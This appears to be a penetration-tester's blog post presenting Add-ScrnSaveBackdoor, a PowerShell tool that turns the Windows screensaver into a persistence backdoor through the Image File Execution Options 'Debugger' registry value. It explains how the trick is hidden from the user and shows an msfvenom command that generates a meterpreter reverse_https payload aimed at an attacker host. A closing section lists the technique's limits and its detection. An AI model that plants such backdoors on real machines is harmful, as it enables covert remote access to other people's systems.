Using Windows Screensaver as a Backdoor with PowerShell

I came across this interesting post about bypassing Windows Lock Screen via Flash Screensaver. While bypassing the lock screen is useful, the method mentioned there needs physical access to the target. This feature of Windows could be used for much more fun without physical access. The fact that Screensaver would run our payload whenever the target would be idle makes it much useful as a backdoor.
Lets see!

Using below simple PowerShell command, from an elevated shell, we can run an executable whenever Screensaver timeout occurs, assuming that the Screensaver in use is the built-in Ribbons.scr

00.JPG

And when the timeout occurs we have a command prompt (which may keep running in a loop). Fun, but needs physical access!
To quickly test screensaver execution, I used MonitorES from here.
Using PowerShell, we can do some neat stuff with this. For example, using the below one liner we can download and execute scripts. We can always change the script on the webserver so a new script could be executed everytime the screensaver starts.
00.JPG
Above could be used to execute PowerShell scripts and modules.
Now, to make it less suspicious for a user, we should be able to launch the screensaver alongwith our command/script. Let me give you, Add-ScrnSaveBackdoor.

Add-ScrnSaveBackdoor

It reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.
A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. It is the value of the “Debugger” to this key where it writes the payload. A screensaver selected from the default ones is added to this payload. When the payload is executed, the screensaver also runs after it to make it appear legit.
Below command shows how to use Add-ScrnSaveBackdoor to execute FireBuster from Nishang for Egress Testing. The FireListener must be started on the attacker’s machine:
01.JPG
Below command executes HTTP-Backdoor from Powerpreter:
02.JPG
And use the below command to execute an in-memory meterpreter in PowerShell format generated using msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell):
03.JPG
Aaaand…

Bingo! With the help of PowerShell, we used this method which required physical access for remote access. It works fine with the “On resume, display logon screen” setting. We can always change contents of the script URL to execute different scripts using the same backdoor.
The source for Add-ScrnSaveBackdoor could be found in Nishang github repo.
Below video shows a walkthrough of the source code and shows Add-ScrnSaveBackdoor in action to pop a reverse_https meterpreter.

Meh!

Administrative  privilege (elevated shell) is required to use Add-ScrnSaveBackdoor.
SCRNSAVE.EXE could be used for evil is known for much longer time.http://www.securityfocus.com/archive/1/434926/30/0/threaded
“Image File execution Options” could be used for evil is also known. So AV *may* catch it.
This setting “can be superceded by the No screen saver Group Policy”
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s